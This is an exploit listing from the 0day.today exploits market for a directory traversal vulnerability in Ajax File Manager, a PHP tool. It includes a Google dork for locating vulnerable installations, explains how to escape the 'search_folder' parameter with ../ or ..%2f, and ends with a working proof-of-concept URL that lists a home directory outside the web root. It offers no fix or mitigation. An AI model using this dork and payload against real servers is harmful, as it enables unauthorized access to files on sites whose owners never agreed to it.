[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ajax File Manager Directory Traversal Vulnerability

Author
Eduardo Alves
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-21996
Category
web applications
Date add
09-03-2014
Platform
php
# Exploit Title: Ajax File Manager  DirectoryTraversal
# Google Dork: inurl: "plugins/ajaxfilemanager"
# Date: 03/07/2014
# Exploit Author: Eduardo Alves (edudx9)
# Vendor Homepage: phpletter.com
# Software Link: http://phpletter.com/Demo/Ajax-File--Manager/
# Version: [app version - All
# Tested on: Windows/Linux
 
 
Ajax File/Image Manager is a l tool  to manager files and images remotely.
Without extra configs, it's possible to list files from another directory.
 
The vulnerability it's related to "search" function"
 
In "search_folder" parameter, escape with ../  or  ..%2f
 
PoF:
 
http://SERVER/PATH/ajaxfilemanager/ajax_get_file_listing.php?limit=10&view=thumbnail&search=1&search_name=&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=../../../../../../../../home/phungv93/public_html/

#  0day.today [2024-11-16]  #